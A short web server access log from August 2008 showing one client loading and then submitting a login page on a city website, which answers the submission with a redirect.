200.63.42.95 - - [28/Aug/2008:06:32:51 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "http://www.sancarloscity.org/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:32:53 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "www.sancarloscity.org"
